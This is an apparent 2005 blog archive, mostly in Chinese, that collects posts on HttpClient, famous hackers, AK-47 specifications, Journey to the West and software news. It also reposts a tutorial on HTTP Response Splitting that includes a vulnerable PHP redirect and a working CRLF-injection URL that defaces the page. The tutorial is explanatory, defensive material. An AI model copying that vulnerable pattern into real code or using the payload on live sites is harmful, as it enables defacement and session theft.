2005-08-28

Httpclient 的 Get 和 Post



使用 org.apache.commons.httpclient 的一个问题。

因为
http://www.google.com/translate_t 可以进行在线翻译。

分析 Html 代码后,使用 Apache 的 Httpclient 写了一个小程序。

使用 httpGetMethod.getResponseBodyAsString() 直接从
http://www.google.com/translate_t?hl=en&ie=UTF-8&text=test&langpair=en|zh-CN
获得页面 Html 代码后,筛选得到 test 翻译后的结果“测试”。

但是这几天突然发现 Google 返回了这样的信息:
Your client does not have permission to get URL:
/translate_t?hl=en&ie=UTF-8&text=test&langpair=en%7Czh-CN
from this server.

"&" 和 "|" 都被转码了......
弄不清楚原因......

今天突然想到,也许我不应当直接 Get ......
我应当向 http://www.google.com/translate_t
Post 上去 hl、ie、text 以及 langpair 的值......

呵呵,不知道思路对不对,等有时间验证一下......

2005-08-12

著名黑客 (Great Hacker)



(本表包含部分骇客)

* 理查德?马修?斯托曼--传统型大黑客,斯托曼在1971年受聘成为美国麻省理工学院人工智能实验室程序员。
* Ken Thompson和Dennis Ritchie--贝尔实验室的电脑科学操作组程序员。两人在1969年发明了Unix操作系统。
* John Draper(以咔嚓船长,Captain Crunch闻名)--发明了用一个塑料哨子打免费电话
* Mark Abene(以Phiber Optik而闻名)--鼓舞了全美无数青少年“学习”美国内部电话系统是如何运作的
* Robert Morris--康奈尔大学毕业生,在1988年不小心散布了第一只互联网蠕虫。
* 米特尼克 (Kevin Mitnick)--第一位被列入美国联邦调查局(FBI)通缉犯名单的骇客。现时正协助FBI参与电脑保安,并计划出版一本有关著名骇客行为的书。
* Kevin Poulsen--Poulsen于1990年成功地控制了所有进入洛杉矶地区KIIS-FM电台的电话线而赢得了该电台主办的有奖听众游戏。
* Vladimir Levin--这位数学家领导了俄罗斯骇客组织诈骗花旗银行向其分发1000万美元。
* 斯蒂夫?沃兹尼亚克--苹果电脑创办人之一,现职小学教师。
* 下村努--于1994年攻破了当时最著名黑客斯蒂夫?沃兹尼亚克的银行帐户。他由于在网上留言版上的一句说话得罪了米特尼克(Kevin Mitnick),使米特尼克决意利用Session Hijacking技术盗走他的网站的流量。后来他在server上设立了Honey Pot让米特尼克中计,结果使米特尼克被捕。
* 李纳斯?托瓦兹--他于1991年开发了著名的Linux内核,当时他是芬兰赫尔辛基大学电脑系学生。
* 若罕?黑尔森尤斯 (Johan Helsingius)--黑尔森尤斯于1996年关闭自己的小商店后开发出了世界上最流行的,被称为“penet.fi"的匿名回函程序,他的麻烦从此开始接踵而至。其中最悲惨的就是山达基教教堂抱怨一个penet.fi用户在网上张贴教堂的秘密后芬兰警方在1995年对他进行了搜查,后来他封存了这个回函程序。
* 埃里克?斯蒂芬?雷蒙 (Eric Raymond)--雷蒙就一直活跃在计算机界,从事各种各样的计算机系统开发工作。同时,雷蒙更热衷于自由软件的开发与推广,并撰写文章、发表演说,积极推动自由软件运动的发展,为自由软件作出了巨大贡献。他写的《大教堂和市集》等文章,是自由软件界的经典美文,网景公司就是在这篇文章的影响下决定开放他们的源代码,使浏览器成为了自由软件大家族中的重要一员。

АК-47



АК-47,是俄语Автомат Калашникова образца 1947 года第一个字母的缩写,意思是卡拉什尼科夫1947年定型的自动步枪,是由米哈伊尔?季莫费耶维奇?卡拉什尼科夫设计的枪,在伊热夫斯克军工厂生产,1947年定型,1951年开始装备前苏联军队,发射7.62X39毫米M1943型枪弹。从1950年代到1980年代,被前苏联军队和华约条约国家军队大量使用。它属于突击步枪,中等口径(7.62毫米,大约等于0.3口径),可以半自动或者全自动的发射方式。与第二次世界大战时步枪相比,枪身小和射程短。

АК-47价廉物美,便于携带,容易清洁和维修。主要由于全自动射击时枪口上跳严重,枪管较短导致瞄准基线较短,瞄准具设计不理想等缺陷,影响了射击精度。1959年投产的改进型号АКМ在一定程度上改善了上述缺点。除了退壳时针偶尔会断外,性能非常可靠,可以在沙漠、热带雨林、严寒等极度恶劣的条件下保持相当好的效能,被誉为“世界枪王”。在越战时期,许多美国士兵丢弃手中的不适应热带雨林恶劣条件下的M-16或者M-14,捡起越南士兵使用的АК-47,只是因为АК-47拥有非常优良的可靠度。

在1980年代改进型АК-74装备前苏联军队后,АК-47系列从苏军装备中退出。

由于АК-47和其改进型使用灵活方便、制造简单和价格便宜,深受非西方国家的喜欢。许多第三世界国家甚至西方国家的军队或者反政府武装都广泛使用物美价廉的АК-47。另外,世界上有许多国家进行了仿制或特许生产,其中包括以色列,芬兰,匈牙利,中国,波兰,罗马尼亚,到现在仍旧再生产。АК-47的设计思路也影响了多个国家步兵武器设计。

AK-47步枪的技术指标:

口径:7.62毫米

枪弹:М1943式7.63 x 39毫米中间威力步枪弹

自动方式:导气式

闭锁方式:枪机回转

供弹具:30发弹夹

射击方式:全自动/半自动

战斗全重:4.8公斤

初速:710米/秒

有效射程:300米

实际射速:100发/分(全自动)

此外,АК-47亦一度是匪徒爱用的枪枝。过去香港的警察的佩枪主要用于防卫用途,所以只配备点38手枪。后来,季炳雄、张子强等悍匪不断在香港做案,并配备了火力强劲的АК-47自动步枪,一度使香港警方束手无策。后来经过改善火力,以及加强情报等各部门的配套,才把局势扭转,进而把匪徒绳之于法。

七十二变



七十二变在西游记中并无详细的叙述,书中是这样写的:

祖师说:“也罢,你要学那一般?有一般天罡数,该三十六般变化;有一般地煞数,该七十二般变化。”悟空道:“弟子愿多里捞摸,学一个地煞变化罢。”祖师道:“既如此,上前来,传与你口诀。”遂附耳低言,不知说了些什么妙法。这猴王也是他一窍通时百窍通,当时习了口诀,自修自炼,将七十二般变化都学成了。

孙悟空第一次使用“七十二变”是在师兄弟前卖弄,变成了一棵松树,但就因为这样被菩提老祖赶走了。

孙悟空用的最多的是变成一个会飞的小虫子。“七十二变”还有“避水诀”,“避火诀”,“分身诀”,“飞天诀”,“遁地诀”,“变化诀”(变成各种东西),“召唤诀”(可以召唤土地公等神仙),“三头六臂”(大闹天宫时用过)。

2005-08-06

Rojo


Subscribe in Rojo

2005-08-05

PlayStation 3 To Support Mac OS X Tiger?

AppleInsider is reporting that Sony's PlayStation 3 gaming console will support Apple's Mac OS X Tiger operating system. "Sony is expected to offer optional hard drives for the PlayStation 3 with potential memory capacity of 80 or 120 GB. It remains to be decided whether the standard version of the PS3 will come complete with a hard drive. The operating system has also yet to be clarified. The integrated Cell processor will be able to support a variety of operating systems (such as Linux or Apple's Tiger)."

2005-08-03

Start.com News

Start.com News
Start.com News

Start.com

start.com
MSN continually seeks to innovate in order to make the web faster, more organized, and personal for consumers. Start.com is one of many incubation projects to achieve this goal. It is an experimental project that launched with start.com/1 in early March 2005. Start.com/2 launched a few weeks later and /3 on June 3.
Style 1
Style 2
Style 3
Screenshot:

MSN Messenger 1.0.0863



Click here to download
MSN Messenger 1.0.0863, uses virtually no memory, includes Sfyx to allow it to sign in and doesnt look crap cos its got Messenger 7 graphics.
Also check out readme here.

2005-08-02

shine's Time



What is HTTP Response Splitting?



Wang Products :: Article
A quick read through the latest vulnerability news on popular security sites such as SecurityFocus or Help Net Security (see our security page for the latest headlines) will usually reveal a number of new exploits found in popular PHP scripts (such as PHP-Nuke, phpBB, Mambo, etc).

Most of the time these exploits will be categorised as "SQL Injection" or "XSS (Cross-Site Scripting)" vulnerabilities, as these are the most common flaws found in PHP/ASP/Perl scripts today. However, in recent months you may have seen reports of scripts being vulnerable to something fairly new - called "HTTP Response Splitting".

The purpose of this FAQ is to give you a brief introduction into what HTTP Response Splitting is, how it occurs, and why it is dangerous.

First of all ? you need to understand what "headers" are in the context of this FAQ article. By "headers", I do not mean HTML page headers or anything to do with html. We are talking about HTTP headers. HTTP headers are small data fields that accompany a Web-based message and help the software that is going to use that message make sense out of it.

For example, request a page using an ordinary web browser and, along with the request itself, a set of HTTP headers will be sent to the server where the page resides. Here are the headers your web browser might send to Google when you visit their site:


GET / HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Accept: text/xml,application/xml,application/xhtml+xml,text/html;...
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7


This provides the web server with a lot of information it needs to know in order to satisfy your request to view the Google web site ? and it also provides Google with a fair bit of extra information that might be of use (in our example above, it tells them the operating system I use and which web browser I have).

The web server then sends HTTP headers back to your browser containing a lot of information that your browser needs to know (including a status code which tells you the result of your request). Here are the typical headers Google might send back to you:


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Content-Encoding: gzip
Server: GWS/2.1
Content-Length: 1040
Date: Tue, 02 May 2005 17:33:58 GMT


If you want to see what HTTP headers your system is sending/receiving ? there are many ways to do so. The best/easiest way is to use a tool like Proxomitron (which acts like a local proxy server for your browser and shows you all HTTP headers that are sent/received), or even better ? if you use the FireFox web browser you can get a plugin called LiveHTTPHeaders to do the job :)

Put simply - HTTP Response Splitting occurs when someone is able to inject their own data into the HTTP headers that the server sends to a web browser. Typically, an attacker will achieve this by crafting a POST or GET request to a vulnerable PHP/ASP/Perl script, containing data designed to add extra HTTP headers which cause the victims browser to do what the attacker wants :)

So, what does the attacker want to achieve by exploiting HTTP Response Splitting? Well, it can be used for the following purposes:


* XSS (Cross-Site Scripting) - HTTP Response Splitting can be used to execute arbitrary HTML/Javascript code in the victims browser (which can lead to cookie/session hijacking) - see our FAQ article entitled "What is Cross Site Scripting (css/xss) ?" for more information on this type of exploit.

* Cache poisoning - the attacker can surf through a proxy server when he exploits the HTTP Response Splitting vulnerability, fooling the proxy server into caching the "injected" HTTP header responses from the server and therefore making the website/server appear defaced to anyone who uses that proxy/cache. HTTP Response Splitting can also be used to poison browser caches, so that the victims browser will cache the defaced/bad page instead of the real one. The cache will continue to give the victim the bad page until their cache is cleared or cleaned.

* Cross user defacement - this is where the attacker makes the web site appear defaced to a particular user (the victim), therefore allowing the attacker to steal session data or cookies etc. It also allows the attacker to steal login information by creating a fake login screen for the website, thus allowing account compromise.

* Hijacking pages - This allows user access to sensitive information, which might be confidential or not normally accessible to the user. With this the attacker can receive the servers response to the client allowing sensitive data from the server to the client to be stolen by the attacker.



HTTP Response Splitting can occur in any script/program that takes user input and outputs it into HTTP headers without filtering the user input for bad characters first (yes, this is yet another vulnerability made possible by poor user input filtering. As we have discussed in previous FAQ articles - you should NEVER trust user input, and should always filter out "bad" characters before you work with variables that contain user input from forms (or query strings via GET).

So - which are the bad characters in this case? Well...the bad characters are actually the carriage return character (CR) and the line-feed character (LF), or as they are more often represented: \r\n:


CR = %0d = \r
LF = %0a = \n


If these characters are not filtered out of user input which gets printed out into HTTP headers by a script/program - then they will be interpreted as a new line, and the start of a new HTTP header item. Can you see where this is going? :)

Lets take a look at what a standard 302 (page redirection) header would look like. This header (when sent to your web browser) causes your browser to redirect from whichever page you requested, to some other page which is specified in the header. The PHP code to generate this 302 redirection header, is as follows:


header ("Location: " . $_GET['page']);
?>


This code above outputs a "Location" header to your browser, which causes your browser to redirect to the page specified in the GET "page" string. So for example, if you accessed the above PHP script like this:


http://www.example.com/thescript.php?page=http://www.wangproducts.com


You would be redirected to http://www.wangproducts.com because your web browser would receive the following headers:


HTTP/1.1 302 Found\r\n
Date: Thu, 06 May 2005 12:15:10 GMT\r\n
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d\r\n
Location: http://www.wangproducts.com\r\n
Transfer-Encoding: chunked\r\n
Content-Type: text/html\r\n


Now www.wangproducts.com will respond with a normal 200 Found response and the user will see the pages at www.wangproducts.com. Notice the "\r\n" carriage return and line feed characters at the end of each line in the HTTP headers.

What you should be thinking at this point is...what happens if I inject my own \r\n characters into the GET "page" string, and then add my own headers after? :) Will they be interpreted as extra headers and sent to my browser? The answer is - yes :) as long as the PHP script does not filter the \r\n out (which our PHP script above does not).

Let's test this out! What if we were to alter the URL above to contain a \r\n (we will add them as %0d and %0a, because this is the method of representing \r and \n respectively when they are provided via a GET/query string). How about - we add our own 200 Found header into the server headers, and then add some HTML after, so that the victims browser will display the HTML instead of redirecting to www.wangproducts.com :) Here is how we do this:


http://www.example.com/thescript.php?page=%0d%0aContent-Length:
%200%0d%0aContent-Type:%20text/html%0d%0aHTTP/1.1%20200%20OK%0d%
0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cb%3EI%20HACK
ED%20YOU%3C/b%3EI%3C/html%3E


(put the above URL all on one line).

I know this looks insane but...when you decode the URL-encoding, this translates to us inputting the following into the GET "page" variable:


\r\n
Content-Length: 0\r\n
Content-Type: text/html\r\n
HTTP/1.1 200 OK\r\n
Content-Type: text/html\r\n

I HACKED YOU


Since the PHP code will not filter out our \r\n and passes our data directly into the header() function - our headers will be injected into the HTTP headers and sent to our browser. This means we have just temporarily "defaced" the site :) The HTTP headers your browser will actually receive are as follows:


HTTP/1.1 302 Found
Date: Thu, 06 May 2005 12:15:10 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d
Location:
Content-Length: 0
Content-Type: text/html
HTTP/1.1 200 OK
Content-Type: text/html

I HACKED YOU
Transfer-Encoding: chunked
Content-Type: text/html


As we can see in above, the server runs the normal 302 response, the arbitrary input we gave in the location header causes it to start a new 200 OK response which shows our inputted data to the user as a normal web server response. This technique is a type of XSS (cross-site scripting) and if you use the right javascript code, you could make it so that the HTTP Response Splitting vulnerability executes code in the victims browser which leads to their cookie/session being hijacked.

If you want to test the cache poisoning implications of this vulnerability, all you need to do is inject Last-Modified, Cache-Control, or Pragma headers into the HTTP headers - so that the "defaced" page becomes cached. You can lookup how to use headers like Last-Modified in a good search engine like Google :)

So - how do we defend against this if we are a PHP/ASP/Perl coder? Simple - by correctly filtering user input! You should NEVER trust user input unless it has been filtered (and even then...don't trust it! always be cautious). For examples of how to filter user input in PHP/ASP - see my other article "SQL Injection Vulnerabilities".

Some of you might be thinking - is this even worth a whole article? is this a real vulnerability? I mean...who on earth writes PHP code that passes user input into header() functions!! right? ... well the sad answer is, many people do...and many large/popular sites/scripts are vulnerable to this type of attack. Want to see a real life example? check out the recent Phorum vulnerability (Phorum is a well-known PHP forum script, like phpBB).

Sources for this article:


* http://www.phpfreaks.com/tutorials/132/0.php

* http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf

* http://www.securityfocus.com/archive/1/393953

Thunderbird



Thunderbird - Reclaim Your Inbox


Thunderbird gives you a faster, safer, and more productive email experience. We designed Thunderbird to prevent viruses and to stop junk mail so you can get back to reading your mail. Read on to find out more about the reasons why you should use Thunderbird as your mail client and RSS reader.

If you've lately taken to cursing at your current e-mail program, then I suggest you give Thunderbird a try. It's the best thing to happen to e-mail in a long time.
- Forbes
This surprisingly full-featured open-source program is a snap to use...
- PC World



Smartest Way to Stop Junk Mail
Thunderbird provides the most effective tools for detecting junk mail. Our tools analyze your e-mail and identify those that are most likely to be junk. You can automatically have your junk mail deleted or you can put it in a folder you specify, just in case you like reading junk mail.


Your Mail, Your Way
View your e-mail the way you want it. Access your e-mail with Thunderbird's new three-column view. Customize your toolbar, change its look with themes, and use Mail Views to quickly sort through your e-mail.


Safe and Secure
Thunderbird provides enterprise and government grade security features such as S/MIME, digital signing, message encryption, support for certificates and security devices.


Packed with Features
Thunderbird gives you IMAP/POP support, a built-in RSS reader, support for HTML mail, powerful quick search, saved search folders, advanced message filtering, message grouping, labels, return receipts, smart address book LDAP address completion, import tools, and the ability to manage multiple e-mail and newsgroup accounts.


Unlimited Features
Thunderbird lets you add additional features as you need them through extensions. Extensions are a powerful tool to help you build a mail client that meets your specific needs.

My BEST Moive:HEAT

Posted by Picasa